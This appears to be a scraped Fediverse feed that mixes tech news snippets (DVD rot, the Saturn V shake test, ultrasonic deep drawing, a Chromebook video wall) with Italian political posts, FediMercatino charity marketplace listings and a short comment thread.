If like us you’ve accumulated a large collection of physical media films and TV shows to while away the long dark days of a post-apocalyptic nightmare where Netflix and Hulu are but a distant memory, you might want to rethink your strategy. Some DVD aficionados have found a troubling trend with “DVD rot,” especially with discs manufactured by Warner Brothers Discovery between 2006 and 2008. It’s not clear what’s going on, but it looks like the polycarbonate cover is delaminating from the inner Mylar layer, resulting in cloudy areas that obscure the data. Warner is aware of the problem and will replace defective discs with the same title if possible, or exchange it for a title of like value if the original is no longer available. We’re dismayed that this defect probably includes our beloved Looney Tunes collection, but on the upside, now we have an excuse to sit through forty straight hours of cartoons.
And finally, if you were a NASA rocket engineer in the 1960s, skipping leg day wasn’t an option. That’s because the Saturn V full-stack shake test on the Apollo program was a very hands-on feet-on process. The shake test was performed to make sure nothing was loose on the stack, and that it would be able to withstand not only the shaking induced by those five massive F-1 engines, but also the occasional hurricane that Florida is famous for. To get the rocket shaking, engineers sat on the deck of the gantry with their legs bridging the gap and their feet up against the side of the service module and gave it all they had. Other engineers literally backed them up, to provide something to push against, while another team on the uppermost platform used a rope to play tug-of-war with the command module. They were able to get the stack moving pretty good, with a meter or so of deflection at the escape tower. It does raise the question, though: what would they have done if the test failed?
youtube.com/embed/s0UYNoTPdNs?…
Călin Georgescu escluso dalle presidenziali afferma: "L'Europa è ormai una dittatura, la Romania è sotto una tirannia!"
Călin Georgescu OFFICIAL ACCOUNT su X: "A direct blow to the heart of democracy worldwide! I have one message left! If democracy in Romania falls, the entire democratic world will fall! This is just the beginning. It’s that simple! Europe is now a dictatorship, Romania is under tyranny!" / X
https://x.com/CG_Romania/status/1898802251558232526
💎Orecchini catena ovale, cristalli bronzo .Pro salvataggio Alberi 🌳Villa Pamphili - Questo è un post automatico da FediMercatino.it
Prezzo: 8 € euro
💎Orecchini catena in metallo , ovale, cristalli bronzo, perno catena circolare .
**
Link diretto all'acquisto 🛒👇
subito.it/hobby-collezionismo/…
**
Con l’acquisto di questo articolo
Puoi decidere di devolvere il 50% del costo di questo articolo a favore del salvataggio degli ALBERI di Villa PAMPHIILJ ROMA
Si prega di contattarmi
NB: il 50% del costo di questo articolo potrai devolverlo
per sostenere le spese per il ricorso al Tar a favore del salvataggio degli alberi promossa dal Neomondismo
Sostieni le spese per il ricorso al TAR!
a favore del salvataggio degli ALBERI di Villa PAMPHIILJ ROMA
pertanto se avrai aderito alla donazione il costo finale dell’articolo sarà pari al 50%
💎 Boucles d'oreilles chaîne ovale, cristaux bronze.
💎 Oval chain earrings, bronze crystals.
💎Pendientes de cadena ovalada, cristales de bronce.
💎 Brincos de corrente oval, cristais de bronze.
💎 Brincos de corrente oval, cristais de bronze.
Price: 8 € euro :: Questo è un articolo disponibile su FediMercatino.it
Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.
Il Mercatino del Fediverso 💵♻️ reshared this.
Deep Drawing with Ultrasonics
Small cylindrical parts are often formed through deep drawing — a process by which a punch forms the finished piece from a flat sheet of metal using a forming die. If it sounds like that stresses the metal, it does. But researchers at Fraunhofer have found a way to reduce friction protecting both the material and the tools that do the forming. The process — known as VibroDraw — uses ultrasonic vibrations at around 500 Hz.
Researchers claim a 20% reduction in friction now, and it may be possible to go even further. With less friction, it is possible to do a deeper draw in a single stage. It also creates less heat which is good for tool life and prevents overheating lubricant. The process has a patent if you want more details. You might need to brush up on your German, though. Unsurprisingly, the vibrations are from a piezoelectric transducer.
Copper is soft enough to use 3D printed dies. We don’t know if this technique would help with that or not. Then there’s hydroforming. If you have any results using ultrasonics with these or any other techniques, be sure to let us know.
Il fattore #Zelensky e la UE
Il fattore Zelensky e la UE
La vicenda politico-militare ucraina è estremamente complessa. Oltre a rappresentare la fine di una strategia della NATO lunga 30 anni - che vedeva la Russia come nemico, il circondarla come tattica militare e sconfiggerla come obiettivo politico - l…www.altrenotizie.org
Old Chromebooks Get Second Life as Video Wall
What would you do with dozens and dozens of outdated Chromebooks that are no longer getting updates from the Google Mothership? It’s a situation that plenty of schools will have to deal with in the near future, and we can only help that those institutions have students as clever as [Varun Biniwale] and his friend [Aksel Salmi] to lean on — as they managed to recycle ten of these outdated laptops into an impressive video display.
There’s actually two write-ups for this particular story, with [Varun] documenting the modification of the Chromebooks and the software developed to play the video between them, and [Aksel] covering how the hardware was ultimately attached to the wall via bespoke 3D printed mounting brackets.
The general idea with this project was to strip each Chromebook down to just a motherboard and an LCD, stick them on the wall, and then play the same video on all of them at once. This sounds relatively easy, but they quickly found out that the limited hackability of ChromeOS to be a limiting factor.
So the decision was made to remove the physical write protection screws from each computer, which would allow for the installation of a standard Linux distribution. Once running stock Debian, it took some custom scripts to get each machine to boot up into Chromium and point at the appropriate web page. From there, socket.io
is used to synchronize the playback of the carefully prepared video file.
On the other side of the project, [Aksel] shows the logistics of taking the machines apart and getting them ready for their new jig. Initial experiments focused on mounting the hardware to a laser-cut piece of acrylic, which looked good, but simply wasn’t robust enough. In the end, the solution was a highly customized 3D printed mount which holds the motherboard securely while also providing a place to attach each LCD.
End-of-life Chromebooks can be had for pennies on the dollar, and they’ll only become more common with time, so we’re eager to see what folks end up doing with them. Between the hardware and software aspects of this particular hack, we’re sure there’s a trick or two you’ll pick up from this one.
youtube.com/embed/6HSC_Q2xEgI?…
DISCO GIRASOLE ,RILIEVO DIPINTO .CERAMICA D’ESTE Pro salvataggio Alberi🌳🌳 Villa Pamphili - Questo è un post automatico da FediMercatino.it
Prezzo: 50 € euro
DISCO GIRASOLE ,RILIEVO DIPINTO .CERAMICA D’ESTE
effetto shabby
Girasole lavorato in rilievo su disco in ceramica , forma medaglia , dipinto a mano , con nastro dorato da appendere alla parete . Colori: sfumature di giallo ocra, zafferano , marrone , panna . Diametro cm 19 . Ceramica di pregio. Collezione Villa d ‘Este. Nuovo
Link diretto all'acquisto 🛒👇
subito.it/arredamento-casaling…
📦🚚Spedizione tracciata e sicura disponibile 📦🚚
👉Per ulteriori informazioni e foto non esitare a contattarmi🌟
👉Vendite concluse con successo con recensioni 5 ⭐stelle verificabili presso altra piattaforma di vendite.
Il confezionamento prevede uno speciale imballo , antiurto a protezione del contenuto 📦
Con l’acquisto di questo articolo
Puoi decidere di devolvere il 50% del costo di questo articolo a favore del salvataggio degli ALBERI di Villa PAMPHIILJ ROMA
Si prega di contattarmi
NB: il 50% del costo di questo articolo potrai devolverlo
per sostenere le spese per il ricorso al Tar a favore del salvataggio degli alberi promossa dal Neomondismo
Sostieni le spese per il ricorso al TAR!
a favore del salvataggio degli ALBERI di Villa PAMPHIILJ ROMA
pertanto se avrai aderito alla donazione il costo finale dell’articolo sarà pari al 50% del costo
Price: 50 € euro :: Questo è un articolo disponibile su FediMercatino.it
Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.
Il Mercatino del Fediverso 💵♻️ reshared this.
Bologna, il Cassero Lgbtqia+ prende le distanze dalla manifestazione per l’Europa del 15 marzo
@Politica interna, europea e internazionale
Intervista alla presidente Camilla Ranuro del Cassero LGBTQIA+ Center Bologna durante la manifestazione dell’8 marzo, che ha visto la partecipazione di circa 10.000 persone. Le attiviste e gli attivisti LGBTQIA+ di Bologna affermano la loro distanza dalla
Politica interna, europea e internazionale reshared this.
Ma davvero andare a cena in una fraschetta mi provoca un sacco di problemi?
@Privacy Pride
Il post completo di Christian Bernieri è sul suo blog: garantepiracy.it/blog/fraschet…
Questo è il primo articolo di Signorina37 scritto per GarantePiracy, eppure è come se fosse qui da sempre. Benvenuta! Attenzione, Signorina37 ha la passione per gli Easter egg. CB L'evoluzione dell'intelligenza artificiale e le
Privacy Pride reshared this.
🕯️Portacandela ,candeliere in ottone con intarsi floreali , e geometrici . Wainberg Pro Salvataggio alberi 🌳 villa Pamphili - Questo è un post automatico da FediMercatino.it
Prezzo: 30 euro
🕯️Portacandela ,candeliere in ottone con intarsi floreali , e geometrici . Wainberg
link all'acquisto 🛒👇
subito.it/arredamento-casaling…
📦🚚Spedizione tracciata e sicura disponibile 📦🚚
👉Per ulteriori informazioni e foto non esitare a contattarmi🌟
👉Vendite concluse con successo con recensioni 5 ⭐stelle verificabili presso altra piattaforma di vendite.
**Con l’acquisto di questo articolo
Puoi decidere di devolvere il 50% del costo di questo articolo a favore del salvataggio degli ALBERI di Villa PAMPHIILJ ROMA**
Si prega di contattarmi
NB: il 50% del costo di questo articolo potrai devolverlo
per sostenere le spese per il ricorso al Tar a favore del salvataggio degli alberi promossa dal Neomondismo
**Sostieni le spese per il ricorso al TAR!
a favore del salvataggio degli ALBERI di Villa PAMPHIILJ ROMA
**
pertanto se avrai aderito alla donazione il costo finale dell’articolo sarà pari al 50% del costo
Price: 30 euro :: Questo è un articolo disponibile su FediMercatino.it
Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.
Il Mercatino del Fediverso 💵♻️ reshared this.
🩷Candela cuore, profumata, rosso borgogna.PRO salvataggio Alberi villa 🌳 Pamphili - Questo è un post automatico da FediMercatino.it
Prezzo: 14 € euro
💜Candela cuore , profumata , rosso borgogna , centrotavola segnaposto , gadget feste a tema . Misure : 13 x 8 cm
link diretto all'acquisto 🛒👇
subito.it/arredamento-casaling…
📦🚚Spedizione tracciata e sicura disponibile 📦🚚
👉Per ulteriori informazioni e foto non esitare a contattarmi🌟
👉Vendite concluse con successo con recensioni 5 ⭐stelle verificabili presso altra piattaforma di vendite.
Con l’acquisto di questo articolo
Puoi decidere di devolvere il 50% del costo di questo articolo a favore del salvataggio degli ALBERI di Villa PAMPHIILJ ROMA
Si prega di contattarmi
NB: il 50% del costo di questo articolo potrai devolverlo
per sostenere le spese per il ricorso al Tar a favore del salvataggio degli alberi promossa dal Neomondismo
Sostieni le spese per il ricorso al TAR!
a favore del salvataggio degli ALBERI di Villa PAMPHIILJ ROMA
pertanto se avrai aderito alla donazione il costo finale dell’articolo sarà pari al 50% del costo
Price: 14 € euro :: Questo è un articolo disponibile su FediMercatino.it
Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.
Il Mercatino del Fediverso 💵♻️ reshared this.
Stesso commento dell'articolo di poco fa'. Gli ipocriti atlantisti europeisti parlano di dittature sempre altrove e additano di autocrati sempre gli altri, poi...
In Italia i pacchetti di aiuti militari all’Ucraina non sono mai passati da un voto parlamentare. Ogni anno il governo fa un decreto, convertito poi dal Parlamento, in cui si autorizza l’invio di armi. Il materiale inviato è segreto, rivelato soltanto al Copasir. E il dibattito politico sul riarmo è tenuto lontano dalle sedi del potere legislativo: Meloni è andata al Consiglio straordinario del 6 marzo senza prima riferire alle Camere, il sì al piano da 800 miliardi è stato concesso senza alcun mandato.
Lega, Forza Italia e Fratelli d’Italia litigano sui giornali e nelle piazze, il Pd si spacca a mezzo intervista, ma in aula il tema non entra. È la diretta conseguenza di anni in cui il Parlamento è stato vieppiù svilito, con un monocameralismo di fatto che stronca la discussione e spesso riduce una delle due camere, a turno, a fare da passacarte.
E non succede solo in in Italia: Parigi scavalca l’Assemblea, a Berlino blitz sul bilancio.
Simon Perry
Unknown parent • — (Reggio Emilia) •@No Noi No non so cosa stia succedendo ma in effetti ultimamente alcuni post sono visibili solo da Poliverso.
Io non faccio altro che scriverli e non ho cambiato impostazioni, non ho idea di cosa stia succedendo.
Ma tanto sono solo cazzate. Non preoccupatevi!
Simon Perry
Unknown parent • •Emanuele
in reply to Simon Perry • • •Simon Perry likes this.
zanfos
in reply to Simon Perry • • •Simon Perry likes this.
Simon Perry
in reply to zanfos • •@zanfos No no, per carità, non si deve censurare nessuno 😀
Dico che Crozza, se avesse maggiormente a cuore la tenuta di questo continente, forse su alcune persone potrebbe egli stesso contenere un po' le critiche. Perché è sempre facile accanirsi contro chi "non fa", ma non pensiamo mai alle alternative, che pure stanno emergendo.
Lo vedo un po' sbilanciato nelle sue critiche, e quello che arriva gli spettatori incapaci di analisi è che "fanno tutti schifo".
E purtroppo tanti di noi ormai ragionano così. Delle due l'una, o Crozza non vuole favorire la sinistra e la democrazia, e allora sono io che non l'ho capito, o ce l'ha con tutti, e in sostanza fa un favore alle destre. Mia modestissima opinione naturalmente.
zanfos
in reply to Simon Perry • • •Simon Perry likes this.